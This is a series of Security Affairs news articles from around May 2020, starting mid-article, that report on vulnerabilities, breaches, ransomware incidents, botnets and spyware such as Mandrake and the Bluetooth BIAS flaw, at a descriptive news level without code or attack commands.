The CVE-2020-3952 vulnerability has received a CVSSv3 score of 10, it resides in the vCenter Server version 6.7 on Windows and virtual appliances.

Pierluigi Paganini

(SecurityAffairs – CVE-2020-3956, hacking)

The post VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director appeared first on Security Affairs.

Adobe fixed several memory corruption issues in some of its products

Adobe addressed multiple memory corruption vulnerabilities, including one that allows arbitrary code execution, in several of its products.

Adobe addressed multiple memory corruption vulnerabilities in several of its products, including an arbitrary code execution.

The issues affect Character Animation, Premiere Rush, Premiere Pro, and Audition, they were reported to Adobe by researcher Mat Powell of Trend Micro’s Zero Day Initiative (ZDI).

APSB20-29 Security update available for Adobe Premiere Rush05/19/202005/19/2020
APSB20-28 Security update available for Adobe Audition05/19/202005/19/2020
APSB20-27 Security update available for Adobe Premiere Pro05/19/202005/19/2020
APSB20-25 Security update available for Adobe Character Animator 05/19/202005/19/2020

The most serious flaw, tracked as CVE-2020-9586, is a critical stack-based buffer overflow affecting the Windows and macOS versions of the Adobe’s Character Animation product.

The vulnerability could be exploited by a remote attacker to execute arbitrary code.

“Adobe has released an update for Adobe Character Animator for Windows and macOS. This update resolves a stack-based buffer overflow vulnerability that could lead to remote code execution.” reads the advisory published by Adobe.

Adobe has also addressed updates an out-of-bounds read vulnerability in Adobe Premiere Rush for Windows and macOS that could lead to information disclosure. 

The IT giant has released security updates for Adobe Premiere Pro for Windows and macOS that addressed an out-of-bounds read vulnerability that could lead to information disclosure.

The last issue addressed by Adobe is a stack-based buffer overflow vulnerability in Adobe Character Animator for Windows and macOS that could lead to remote code execution. 

The good news is that Adobe is not aware of attacks in the wild that exploited the above vulnerabilities and assigned them a priority rating of 3 because they are unlikely to ever be exploited.

At the beginning of this month Adobe released security updates to address 36 vulnerabilities in Adobe Acrobat, Reader, and Adobe DNG Software Development Kit.

Pierluigi Paganini

(SecurityAffairs – memory corruption flaws, hacking)

The post Adobe fixed several memory corruption issues in some of its products appeared first on Security Affairs.

Israel is suspected to be behind the cyberattack on Iranian port

Israel is likely behind the recent cyberattack which disrupted some operations at Iran’s Shahid Rajaei Port, located near the Strait of Hormuz.

A couple of weeks ago, Iranian officials announced that hackers damaged a small number of systems at the port of Shahid Rajaei in the city of Bandar Abbas.

Bandar Abbas is the capital of Hormozgān Province on the southern coast of Iran, on the Persian Gulf. The city occupies a strategic position on the narrow Strait of Hormuz, and it is the location of the main base of the Iranian Navy. Bandar Abbas is also the capital and largest city of Bandar Abbas County.

Iranian officials did not reveal details of the cyber attack that took place on May 9, two days before Iranian officials disclosed the incident.

Local authorities, including the Ports and Maritime Organization (PMO) in the state of Hormozgan, confirmed that operations at the port were impacted by the cyber attack.

Initially, officials denied the cyber-attack, but due to media pressure that later admitted the cyber intrusion.

The authorities did not attribute the attack to a specific threat actor, Iran’s Deputy Minister of Roads and Urban Development stated that he did not have any information about the origin of the attack.

“Currently, the distribution of cargo in northern ports is good; although the performance of all southern ports is negative.” Mohammad Rastad.

Rastad told Fars News Agency that the attack was carried out by a foreign governenment.

Now a foreign government security official said the attack was “highly accurate” and the damages caused to the Iranian infrastructure were greater than described in official Iranian accounts.

The news was reported by The Washington Post, which blamed Israel for the cyber attack that was launched in retaliation for an earlier cyberattack on rural water distribution systems in Israel.

In April, the Israeli government has issued an alert to organizations in the water sector following a series of cyberattacks that targeted the water facilities.

Earlier May, Israel’s security cabinet discussed alleged Iranian cyberattack on Israeli water and sewage facilities that fortunately did not cause serious damage. The attack demonstrates an escalation by the Iranians, because they targeted civilian infrastructure.

“This was a very unordinary cyberattack against civilian water facilities which is against every ethic and every code even in times of war,” a senior Israeli official told Channel 13. “We didn’t expect this even from the Iranians. It is just not done.”Iran reported three cyberattacks within one week back in December. At least one of the attacks was allegedly “state-sponsored.”

Israel’s National Cyber Directorate announced to have received reports of cyber attacks aimed at supervisory control and data acquisition (SCADA) systems at wastewater treatment plants, pumping stations and sewage facilities.

The recent attack could be a response of the Israeli cyber army against the wave of attacks that targeted Israely water sector.

“Israel appears to be behind a cyberattack earlier this month on computers at Iran’s Shahid Rajaee port that caused massive backups on waterways and roads leading to the facility, the Washington Post reported on Monday.” reads the report published by the Reuters.

“Citing unnamed U.S. and foreign government officials, the Post said the May 9 disruption of Iranian computers was presumably in retaliation for an earlier attempted cyberattack on rural water distribution systems in Israel.”

The Reuters agency contacted the Israeli Embassy in Washington for a comment by it has yet to respond.

In December 2019, Iran foiled two massive cyber-attacks in less than a week, the country’s telecommunications minister Mohammad Javad Azari-Jahromi revealed.

The news was reported by both the ISNA and Mehr news agencies, the Iranian minister defined the attacks as “really massive” and attributed them to a nation-state actor.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Israel is suspected to be behind the cyberattack on Iranian port appeared first on Security Affairs.

Researchers disclose five Microsoft Windows zero-days

Security experts have disclosed five unpatched vulnerabilities in Microsoft Windows, four of which rated as high-risk severity.

Security experts from Trend Micro’s Zero Day Initiative (ZDI) have published information on five unpatched vulnerabilities in Microsoft Windows.

Four vulnerabilities are classified as high-risk severity, three of them are zero-day vulnerabilities tracked as CVE-2020-0916, CVE-2020-0986, and CVE-2020-0915. The flaws could allow an attacker to escalate privileges on the affected system, they received a CVSS score of 7.0.

The vulnerabilities affect in the user-mode printer driver host process splwow64.exe, and is caused by the lack of validation for user-supplied input being dereferenced as a pointer. 

The fourth issue affecting the user-mode printer driver host process splwow64.exe, tracked as CVE-2020-0915, is a low severity information disclosure vulnerability.

The issue is caused by the lack of validation of a user-supplied value before being dereferenced as a pointer.

ZDI reported the issue to Microsoft in December 2019, but the tech giant failed to address them with May 2020 Patch Tuesday.

The last zero-day vulnerability disclosed by Trend Micro’s Zero Day Initiative (ZDI) is a privilege escalation vulnerability in the handling of WLAN connection profiles.  

“This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.” reads the advisory published by Trend Micro.

“The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.”

Pierluigi Paganini

(SecurityAffairs – Microsoft Windows, hacking)

The post Researchers disclose five Microsoft Windows zero-days appeared first on Security Affairs.

Three flaws in Nitro Pro PDF reader expose businesses to hack

Two vulnerabilities in the Nitro Pro PDF editor could be exploited by threat actors to execute code remotely on vulnerable hosts.

Security experts from Cisco Talos have discovered three vulnerabilities in the Nitro Pro PDF editor, two of which rated as critical (CVSS score of 8.8) could be exploited by attackers for remote code execution.

Nitro Pro is a PDF application designed for creating, reading, editing, signing, converting, and protecting PDFs. The software is part of Nitro Software’s suite of enterprise tools, used by tens of thousands of organizations.

nitro pro Nitro

The first issue, tracked as CVE-2020-6074, is a nested pages remote code execution vulnerability that resides the PDF parser of Nitro Pro. An attacker could exploit the vulnerability by tricking the victims into opening a specially crafted PDF to trigger a use-after-free condition.

“An exploitable code execution vulnerability exists in the PDF parser of Nitro Pro 13.9.1.155. A specially crafted PDF document can cause a use-after-free which can lead to remote code execution. An attacker can provide a malicious file to trigger this vulnerability.” reads the advisory published by the company.

The second vulnerability, tracked as CVE-2020-6092, is an object code execution vulnerability that resides in the way Nitro Pro 13.9.1.155 parses Pattern objects. An attacker could exploit the flaw by tricking the victims into opening a specially crafted PDF and trigger an integer overflow and then achieve remote code execution.

“An exploitable code execution vulnerability exists in the way Nitro Pro 13.9.1.155 parses Pattern objects. A specially crafted PDF file can trigger an integer overflow that can lead to arbitrary code execution. A victim must open a malicious file to trigger this vulnerability” continues the advisory.

The third flaw is a Javascript XML error handling information disclosure vulnerability, tracked as CVE-2020-6093.

The information disclosure vulnerability exists in the way the version 13.9.1.155 handles XML errors,e it could be exploited by an attacker by tricking the victims into opening a specially crafted PDF document that can cause uninitialized memory access and consequent information disclosure.

Cisco security researchers also identified an information disclosure vulnerability in the application. Tracked as CVE-2020-6093 and carrying a CVSS score of 6.5, the bug is related to the way Nitro Pro does XML error handling.

In early May, the software vendor released a security update that address the above vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – PDF, hacking)

The post Three flaws in Nitro Pro PDF reader expose businesses to hack appeared first on Security Affairs.

Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials

The Ukrainian Secret Service (SSU) has arrested a hacker known as Sanix, who was selling billions of stolen credentials on hacking forums and Telegram channels.

The popular hacker Sanix has been arrested by the Ukrainian Secret Service (SSU). The man is known in the cybercrime underground for selling billions of stolen credentials. The officials did not disclose the man of the cybercriminals, they only said that the man has been arrested in Ivano-Frankivsk, Ukraine.

“The Security Service of Ukraine has identified and detained a hacker known as Sanix. Early last year, it caught the attention of global cybersecurity experts by posting on one of the forums the sale of a database with 773 million e-mail addresses and 21 million unique passwords.” reads a press release published by the SSU.

“SBU cyber specialists recorded the sale of databases with logins and passwords to e-mail boxes, PIN codes for bank cards, e-wallets of cryptocurrencies, PayPal accounts, information about computers hacked for further use in botnets and for organizing DDoS attacks”

The man was known for aggregating data, including users’ credentials, in lists that were offered for sale via Telegram (where he used the nickname Sanixer) or in hacking forums.

Sanix was identified by the investigator Brian Krebs as the source of Collection 1 in January 2019. Some of the most popular collections sold in the past by the same hacker are known as Collection #1, #2, #3, #4, #5, Antipublic, and others.

Collection #1

Sanix has been active on the cybercrime underground at least since 2018, he focuses in the sale of stolen data from organizations.

It has been estimated that the man amassed billions of unique username-password combinations.

Stolen credentials were bought by fraudsters, hackers, and scammers to carry out a broad range of malicious activities, such as launching malspam campaign or take over users’ accounts.

During searches at his residence, SSU officers seized computer equipment containing two terabytes of stolen information, phones with evidence of illegal activities and cash from illegal transactions in the amount of almost 190,000 Ukrainian hryvnias (roughly $7,000) and more than $3000.

Pierluigi Paganini

(SecurityAffairs – Sanix, hacking)

The post Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials appeared first on Security Affairs.

Bluetooth BIAS attack threatens billions of devices

Boffins disclosed a security flaw in Bluetooth, dubbed BIAS, that could potentially be exploited by an attacker to spoof a remotely paired device.

Researchers from École Polytechnique Fédérale de Lausanne (EPFL) discovered a vulnerability in Bluetooth, dubbed Bluetooth Impersonation AttackS or BIAS, that could potentially be exploited by an attacker to spoof a remotely paired device.

The issue potentially impact over a billion of devices.

“To establish an encrypted connection, two Bluetooth devices must pair with each other using a link key. It is possible for an unauthenticated, adjacent attacker to impersonate a previously paired/bonded device and successfully authenticate without knowing the link key. This could allow an attacker to gain full access to the paired device by performing a Bluetooth Impersonation Attack (BIAS).” reads the vulnerability note VU#647177.

The Bluetooth specification is affected by security flaws that could allow attackers to carry out impersonation attacks while establishing a secure connection.

For BIAS attack to be successful, the attacker has to use a device that would need to be within wireless range of a vulnerable Bluetooth device that has previously established a BR/EDR bonding with a remote device with a Bluetooth address known to the attacker.

To establish an encrypted connection, two Bluetooth devices must pair with each other using a link key, aka long term key.

The experts explained that the flaw results from how two previously paired devices handle the link key. The link key allows two paired devices to maintain the connection every time a data is transferred between the two devices.

The experts discovered that it is possible for an unauthenticated attacker within the wireless range of a target Bluetooth device to spoof the address of a previously paired remote device to successfully complete the authentication procedure with some paired/bonded devices without knowing the link key.

“The Bluetooth standard includes a legacy authentication procedure and a secure authentication procedure, allowing devices to authenticate to each other using a long term key. Those procedures are used during pairing and secure connection establishment to prevent impersonation attacks. In this paper, we show that the Bluetooth specification contains vulnerabilities enabling to perform impersonation attacks during secure connection establishment.” reads the research paper. “Such vulnerabilities include the lack of mandatory mutual authentication, overly permissive role switching, and an authentication procedure downgrade.”

The researchers reported their findings to the Bluetooth Special Interest Group (SIG), in December 2019.

“The researchers identified that it is possible for an attacking device spoofing the address of a previously bonded remote device to successfully complete the authentication procedure with some paired/bonded devices while not possessing the link key. This may permit an attacker to negotiate a reduced encryption key strength with a device that is still vulnerable to the Key Negotiation of Bluetooth attack disclosed in 2019.” reads the advisory published by the Bluetooth SIG. “If the encryption key length reduction is successful, an attacker may be able to brute force the encryption key and spoof the remote paired device. If the encryption key length reduction is unsuccessful, the attacker will not be able to establish an encrypted link but may still appear authenticated to the host.”

Experts explained that combining the BIAS attack with other attacks, such as the KNOB (Key Negotiation of Bluetooth) attack, the attacker van brute-force the encryption key and use it to decrypt communications.

“The BIAS and KNOB attacks can be chained to impersonate a Bluetooth device, complete authentication without possessing the link key, negotiate a session key with low entropy, establish a secure connection, and brute force the session key” states the paper.

Experts tested the attack against as many as 30 Bluetooth devices and discovered that all of them were found to be vulnerable to BIAS attacks.

The Bluetooth SIG has addressed the vulnerability announcing the introduction of changes into a future specification revision.

The SIG recommends Bluetooth users to install the latest updates from the device and operating system manufacturers.

“The BIAS attacks are the first uncovering issues related to Bluetooth’s secure connection establishment authentication procedures, adversarial role switches, and Secure Connections downgrades,” the paper concludes. “The BIAS attacks are stealthy, as Bluetooth secure connection establishment does not require user interaction.”

Pierluigi Paganini

(SecurityAffairs – BIAS attack, hacking)

The post Bluetooth BIAS attack threatens billions of devices appeared first on Security Affairs.

Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details

British airline EasyJet announced it was the victim of a “highly sophisticated” cyber attack that exposed email addresses and travel details of around 9 million of its customers.

British airline EasyJet announced that a “highly sophisticated” cyber-attack exposed email addresses and travel details of around 9 million of its customers.

“Following discussions with the Information Commissioner’s Office (“ICO”), the Board of easyJet announces that it has been the target of an attack from a highly sophisticated source.” reads a statement from the company. “Our investigation found that the email address and travel details of approximately 9 million customers were accessed.” 

According to the company, hackers also accessed a small subset of customers and obtained credit card details for 2,208 of them, no passport details were exposed.

“Our forensic investigation found that, for a very small subset of customers (2,208), credit card details were accessed.” continues the company.

At the time of writing the airline did not disclose details of the security breach, it is not clear when the incident took place and how EasyJet discovered the intrusion.


EasyJet conducted a forensic investigation and once identifies the unauthorized access has locked it.

The airline reported the incident to the Information Commissioner’s Office (“ICO”), the good news is that the company is not aware of any attack in the wild that abused the stolen information.

EasyJet is still investigating the security breach.

“We take the cybersecurity of our systems very seriously and have robust security measures in place to protect our customers’ personal information. However, this is an evolving threat as cyber attackers get ever more sophisticated,” says EasyJet Chief Executive Officer Johan Lundgren.

“Since we became aware of the incident, it has become clear that owing to COVID-19, there is heightened concern about personal data being used for online scams. Every business must continue to stay agile to stay ahead of the threat.”

The airline has started notifying the incident to all the impacted customers and is recommending them to be “extra vigilant, particularly if they receive unsolicited communications.”

According to the Reuters that cited two people familiar with the investigation, hacking tools and techniques used by attackers point to a group of suspected Chinese hackers that targeted multiple airlines in recent months.

Pierluigi Paganini

(SecurityAffairs – EasyJet, hacking)

The post Easyjet hacked: 9 million customer’s data exposed along with 2,200+ credit card details appeared first on Security Affairs.

Australian product steel producer BlueScope hit by cyberattack

The Australian flat product steel producer BlueScope Steel Limited was hit by a cyberattack that caused disruptions to some of its operations.

Australian steel producer BlueScope was recently hit by a cyberattack that disrupted some of its operations.

The incident was spotted on Friday at one of its businesses located in the US, but the company did not share any detail about the attack.

“BlueScope today confirmed that its IT systems have been affected by a cyber incident, causing disruptions to parts of the Company’s operations. Our North Star, Asian and New Zealand businesses are continuing largely unaffected with minor disruptions.” reads the statement published by the company. “In Australia, manufacturing and sales operations have been impacted; some processes have been paused, whilst other processes including steel despatches continue with some manual processes and workarounds.”

The problems faced by the company are usually the result of a ransomware attack, the suspect is confirmed by iTnews that said the incident was caused by this family of malware and that is restoring systems from backups.

“BlueScope Steel is suffering IT “disruption” that is believed to be the result of a ransomware infection, impacting production systems used by its global operations.” reads a post published by iTnews. “iTnews has learned that production systems were halted company-wide in the early hours of Thursday morning, though recovery from backup was understood to be progressing on Thursday afternoon.”

BlueScope confirmed that the security incident impacted some of its IT systems. Manufacturing and sales operations in Australia were deeply impacted.

“In the affected areas the Company has reverted to manual operations where possible while it fully assesses the impact and remediates as required, in order to return to normal operations as quickly as possible.” continues the post.

Recently another Australian giant was hit by ransomware, the transportation and logistics giant Toll disclosed a security incident.

In May, Toll Group informed its customers that it has shut down some IT systems after a new ransomware attack, it is the second infection disclosed by the company this year.

Toll staff discovered the infection after noticing unusual activity on some servers, further investigation revealed the presence of the Nefilim ransomware.

Pierluigi Paganini

(SecurityAffairs – BlueScope, hacking)

The post Australian product steel producer BlueScope hit by cyberattack appeared first on Security Affairs.

Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

Spear-phishing is a rapidly emerging threat. It’s more specific than generic phishing attempts and often targets a single person or company. Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers. 

Cybercriminals Capitalizing on the Chaos

The coronavirus is forcing companies in most industries to operate substantially differently. Many may find it takes time to adjust to the changes. Others do not immediately have the resources for a major shift, such as having all employees work remotely. 

A related concern is that COVID-19 is both a new and anxiety-inducing issue. People want to learn as much as they can about it, and their haste may result in them clicking on links without thinking. Cybercriminals view these conditions as ideal for orchestrating their attacks. Data from Barracuda cybersecurity researchers identified a 667% increase in spear-phishing attacks between the end of February and the following month. 

Real-Life Examples of Spear-Phishing Attacks in the Energy Production Sector

The threat of spear-phishing for energy companies is, unfortunately, not a theoretical one. Coverage published in late April by Bitdefender illuminated a carefully executed attack. The research team found evidence of a campaign occurring March 31, whereby hackers impersonated a well-known engineering company with experience in on- and off-shore energy projects. 

The messages — which did not include many of the telltale signs of phishing like spelling and grammatical errors — asked recipients to submit equipment and materials bids for the Rosetta Sharing Facilities Project. Participants would do so on behalf of Burullus, a gas joint venture partially owned by another Egyptian state oil brand. 

The emails also contained two attachments, which were supposedly bid-related forms. Downloading them infected a user’s system with a type of trojan spyware not previously seen in other utilities industry cyberattacks. The effort targeted oil companies all over the world, from Malaysia to South Africa, in a single day. 

Bitdefender’s research team also uncovered a more geographically specific spear-phishing attempt to target the gas sector on April 12. It centered on a relatively small number of shipping companies based in the Philippines. The emails asked them to send details associated with an oil tanker vessel and contained industry-specific language. This spear-phishing campaign occurred over two days. 

The cybersecurity experts that studied these attacks stressed that, since the messages contained accurate details about real-life companies and events associated with the oil industry, the attackers took the time to research to craft maximally convincing content. 

Hackers Love Causing Severe Disruptions

Why are cyberattacks in the energy industry suddenly on the rise? One reason may stem from the way hackers often deploy tactics to cause tremendous harm to necessary services. The oil industry operates on a vast scale. For example, a company specializing in oil and gas exploration planned as much as 300,000 feet of total footage for drilling in one region during 2018. 

The ability to get such impressive outcomes undoubtedly helps oil companies. The increased scale also may make it more necessary to safeguard against cyberattacks, especially as criminals look for ways to cause the most damage. Another recent incident, announced in a United States government alert on February 18, shut down a natural gas compression facility. Operations stopped for two days, causing losses in productivity and revenue. 

Although the publication did not name the energy company, it mentioned that the hackers depended on spear-phishing to get the credentials necessary for entering the businesses’ information technology (IT) network. It then used that access to wreak havoc on the enterprise’s operational technology infrastructure. 

Not a New Concern

Utilities industry cyberattacks have long worried cybersecurity analysts. If concentrated efforts from hackers shut down the electric grid, the effects could be long-lasting and hit virtually every industry and consumer in the affected areas. The risks to the energy sector began before the coronavirus pandemic, too. 

In November 2019, cybersecurity publications discussed a ransomware attack on Petróleos Mexicanos, Mexico’s largest oil and gas company. The perpetrators asked for 562 bitcoins to restore the data. The affected enterprise did not comply, and it had important data backed up. 

Toll Group, an Australian transportation and logistics company with oil and gas companies as clients, suffered a ransomware attack this spring. It was the second such issue in four months, with the first happening in February. 

The Energy Industry Must Remain Vigilant

The challenges posed by COVID-19 and its effect on oil prices may make the respective parties feel the impacts of cyberattacks in the energy industry more acutely. An ideal aim is to prevent those events rather than dealing with the damage afterward. Paying attention to cybersecurity vulnerabilities can help companies make meaningful gains and stay protected.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Hackers Target Oil Producers During COVID-19 Slump appeared first on Security Affairs.

Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways

Experts from Palo Alto Networks discovered that the Mirai and Hoaxcalls botnets are targeting a vulnerability in legacy Symantec Web Gateways.

Palo Alto Networks Unit 42 researchers observed both the Mirai and Hoaxcalls botnets using an exploit for a post-authentication Remote Code Execution vulnerability in legacy Symantec Web Gateways 5.0.2.8.

“I recently came across new Hoaxcalls and Mirai botnet campaigns targeting a post-authentication Remote Code Execution vulnerability in Symantec Secure Web Gateway 5.0.2.8, which is a product that became end-of-life (EOL) in 2015 and end-of-support-life (EOSL) in 2019.” reads the analysis published by Palo Alto Networks. “There is no evidence to support any other firmware versions are vulnerable at this point in time and these findings have been shared with Symantec.”

Symantec pointed out that the flaw has been fixed in Symantec Web Gateway 5.2.8 and that it doesn’t affect Secure Web Gateway solutions, such as ProxySG and Web Security Services.

Experts first observed the exploitation of the flaw in the wild on April 24, 2020, as part of an evolution of the Hoaxcalls botnet that was first discovered early of April. The botnet borrows the code from Tsunami and Gafgyt botnets, it expanded the list of targeted devices and added new distributed denial of service (DDoS) capabilities.

Operators behind the Hoaxcalls botnet started using the exploit a few days after the publication of the vulnerability details.

Hoaxcalls update-URL

In the first week of May, the experts also spotted a Mirai variant using the same exploit, but this samples don’t contain any DDoS capabilities.

“they serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability This blog post provides any noteworthy technical details on these two campaigns.” continues the report.

According to Unit 42, both the Mirai and Hoaxcalls botnets used payloads designed to discover and infect vulnerable devices. In the case of Mirai, the bot is able to propagate via either credential brute-forcing or exploitation of the Symantec Web Gateways exploit.

Experts note that the exploit is only effective for authenticated sessions and the affected devices are End of Life (EOL) from 2012.

“In the case of both campaigns, one can assume that their success with this exploit is limited by the post-authentication nature of the Symantec Secure Web Gateway RCE vulnerability.” concludes Palo Alto Networks.

The report published by Palo Alto Networks contains technical details about the botnet, including the Indicators of Compromise (IoCs)

Pierluigi Paganini

(SecurityAffairs – Symantec Web Gateways, hacking)

The post Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways appeared first on Security Affairs.

129 million records of Russian car owners available on the dark web

A hacker is offering for sale on a dark web forum a database containing 129 million records of car owners in Moscow.

A hacker is attempting to sell on a dark web forum a database containing 129 million records of car owners in Moscow.

As a proof of the authenticity of the data, the hacker has leaked some anonymized data containing all the car details present in the traffic police registry.

The archive doesn’t include car owners’ details, exposed data includes the car’s make and model, place of registration, and the date of first and last registration.

The seller is offering the full version of the database for 0.3 BTC, which at the current rate is about $ 2677, paying 1.5 BTC ($ 13.386) it is possible to purchase information for “exclusive use.”

The accuracy of the data has been verified by Vedomosti media.

“Hackers posted a darknet database of Russian car owners, it includes 129 million positions from the traffic police registry. The authenticity of the information was confirmed by an employee of the car-sharing company, Vedomosti reports.” reads the website rbc.ru.

“In the published data there is only anonymized information. These include: place and date of registration of the car, make and model. According to hackers, the full version also contains the name, address, date of birth, passport numbers of car owners and their contact information.”

According to the Russian blog Nora the Hedgehog, several portals where people can pay fines for violating COVID-19 quarantine are leaking their full names and passport numbers by simply providing the registration number of the ticket.

The worst news is that the portals don’t implement any protection against brute-force attacks, allowing attackers to try all the possible combinations of unique ticket numbers to retrieve personal details of the people that paid the fines.

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)

The post 129 million records of Russian car owners available on the dark web appeared first on Security Affairs.

A bug in Edison Mail iOS app impacted over 6,400 users

A security bug in the iOS app has impacted over 6,400 Edison Mail users, the issue allowed some users to access other people’s email accounts.

An update released for iOS application of the Edison Mail introduced a security bug that resulted in some users being given access to other people’s email accounts.

“On Friday, May 15th, 2020, a software update enabled users to manage accounts across their Apple devices. This update caused a technical malfunction that impacted approximately 6,480 Edison Mail iOS users. The issue only impacted a fraction of our iOS app users (and no Android or Mac users were affected). This temporary issue was a bug, and not related to any external security issues.” reads a post published by the company.

“Data from these individual’s impacted email accounts may have been exposed to another user. No passwords were compromised. “

The Edison Mail app allows users to manage their Gmail, Yahoo, Outlook, iCloud, and other email services in a single place. The company offers apps for iOS, Android and macOS, and says its products are used by millions of individuals.

edison mail assistant-ios

The update was rolled out on May 15, it included a feature that allows users to manage their accounts across their Apple devices.

Shortly after the patch was released, some users started reporting they could access other people’s email accounts from the iOS app without authentication.

Edison quickly solved the issue, the company confirmed that the bug potentially impacted 6,480 iOS users.

Edison Mail also confirmed that user credentials were not exposed.

The company addressed the issue with two updates, the first one on Saturday that prevented impacted users from accessing any account from the Edison app, the second one on Sunday morning, which re-enabled access for impacted users.

“A new version of the application was made available early Sunday morning in the App Store that restores full functionality for these 6,480 users. Other users were not impacted and no action is required.” added the company.

“We have notified all individual users who may have been impacted by this issue via email, and as an additional safety precaution, suggested that impacted users also change their email account password. If you did not receive an email on this issue then your account was not impacted,”

Pierluigi Paganini

(SecurityAffairs – Edison Mail, hacking)

The post A bug in Edison Mail iOS app impacted over 6,400 users appeared first on Security Affairs.

Texas Department of Transportation (TxDOT) hit by a ransomware attack

A new ransomware attack hit the Texas government, the malware this time infected systems at the state’s Department of Transportation (TxDOT).

The Texas government suffered two ransomware attacks in a few weeks, the first one took place on May 8, 2020 and infected systems at the Texas court.

Now ransomware has infected malware the systems at the state’s Department of Transportation (TxDOT), that attack forced the administrators to shut down the systems to avoid the propagation of the ransomware.

The state’s Department of Transportation (TxDOT) discovered the second attack on May 14, the infection follows an unauthorized access to the Department’s network.

“The Texas Department of Transportation determined that on May 14, 2020, there was unauthorized access to the agency’s network in a ransomware event” states the TxDOT.

The agency immediately took steps to prevent further damages and isolated impacted systems, it “working to ensure critical operations continue during this interruption.”

The agency reported the incident to local authorities and is investigating into the incident with the help of the FBI.

At the time of writing it is not clear if the two attacks are connected, there are no technical details about both incidents either if the attackers have stolen any data.

In August 2019, Texas was hit by a wave of ransomware attacks that are targeting local governments.

At least 23 local government organizations were impacted by the ransomware attacks, the Department of Information Resources (DIR) is currently investigating them and providing supports to mitigate the attacks.

Pierluigi Paganini

(SecurityAffairs – TxDOT, hacking)

The post Texas Department of Transportation (TxDOT) hit by a ransomware attack appeared first on Security Affairs.

Mandrake, a high sophisticated Android spyware used in targeted attacks

Security experts discovered a highly sophisticated Android spyware platform, dubbed Mandrake, that remained undetected for four years.

Researchers from Bitdefender discovered a high-sophisticated Android spyware platform dubbed Mandrake, it was involved in highly targeted attacks against specific devices. Mandrake is an advanced cyberespionage platform, but experts believe the attacks are financially motivated.

Threat actors behind this campaign managed to fly under the radar for as long as possible. Attackers carefully selected the devices to infect and avoid compromise devices in countries that are of interest to them.

“Mandrake stood in the shadow for at least 4 years. During this time, it stole data from at least tens of thousands of users.” reads the report published by Bitdefender. “It takes special care not to infect everyone” – This is exactly what the actor did and most likely why it remained under the radar for 4 full years. Because of this strategy, the actual number of infections we were able to trace is quite low; Google Play Apps used as droppers to infect targets have only hundreds or – in some cases – thousands of downloads. It might even be possible that some of the infected users won’t face an attack at all if they present no interest to the actor.”

Most of the infections are in Australia, followed in Europe, America, and Canada. Experts observed two different waves of attacks, a first one in 2016 and 2017.

Experts detected seven malicious applications delivering Mandrake in Google Play alone, namely Abfix, CoinCast, SnapTune Vid, Currency XE Converter, Office Scanner, Horoskope, and Car News.

Mandrake

Sinkholing performed by the experts revealed about 1,000 victims during a 3-week period. The researchers estimated that the tens of thousands, and probably hundreds of thousands, were infected in the last 4 years.

During the past four years, the platform has received numerous updates, operators constantly implemented new features.

Mandrake allows attackers to gain complete control over an infected device and exfiltrate sensitive data, it also implements a kill-switch feature (a special command called seppuku (Japanese form of ritual suicide)) that wipes all victims’ data and leave no trace of malware.

“The attacker has access to data such as device preferences, address book and messages, screen recording, device usage and inactivity times, and can
obviously paint a pretty accurate picture of the victim, and their whereabouts.” continues the report. “The malware has complete control of the device: it can turn down the volume of the phone and block calls or messages, steal credentials, exfiltrate information, to money transfers and blackmailing. It can conduct phishing attacks, by loading a webpage and injecting a specially crafted JavaScript code to retrieve all data from input forms.”

The list of targets is long and includes an Australian investment trading app, crypto-wallet apps, the Amazon shopping application, Gmail, banking software, payment apps, and an Australian pension fund app.

The malware avoids the detection delaying the activities and working in three stages: dropper, loader, and core.

The dropper is represented by the apps published in Google Play, while it is not possible to determine when the loader and the core are delivered.

The malware implements evasion techniques such as anti-emulation and leverages administrator privileges and the Accessibility Service to achieve persistence.

The report contains technical details about the threat, including Indicators of Compromise.

Pierluigi Paganini

(SecurityAffairs – Mandrake, hacking)

The post Mandrake, a high sophisticated Android spyware used in targeted attacks appeared first on Security Affairs.

FBI warns US organizations of ProLock ransomware decryptor not working

The FBI‌ issued a flash alert to warn organizations in the United States that the ProLock ransomware decryptor doesn’t work properly.

Early this month, the FBI‌ issued a flash alert to warn organizations of the new threat actor targeting healthcare, government, financial, and retail industries in the US.

“The decryption key or ‘decryptor’ provided by the attackers upon paying the ransom has not routinely executed correctly,” states the alert.

“The decryptor can potentially corrupt files that are larger than 64MB and may result in file integrity loss of approximately 1 byte per 1KB over 100MB.”

Threat actors are attempting to take advantage of the ongoing Coronavirus pandemic and are using COVID-19 lures in their attacks.

Experts reported several ransomware attacks against businesses and organizations, the ProLock ransomware is just is yet another threat to the list.

The FBI is recommending victims of ransomware attacks to avoid paying the ransom to decrypt their files. Feds warned that the decryptor for the ProLock is not correctly working and using it could definitively destroy the data. The descriptor could corrupt files larger than 64MB during the decryption process.

The PwndLocker ransomware first appeared in the threat landscape by security researchers in late 2019, operators’ demands have ranged from $175,000 to more than $660,000 worth of Bitcoin.

According to the FBI, operators behind the threat gain access to hacked networks via the Qakbot (Qbot) trojan, but experts from Group-IB added that they also target unprotected Remote Desktop Protocol (RDP)-servers with weak credentials. It is still unclear if the ProLock ransomware was managed by the Qakbot gang, or if the ProLock operators pay to gain access to hosts infected with Qakbot to deliver their malware.

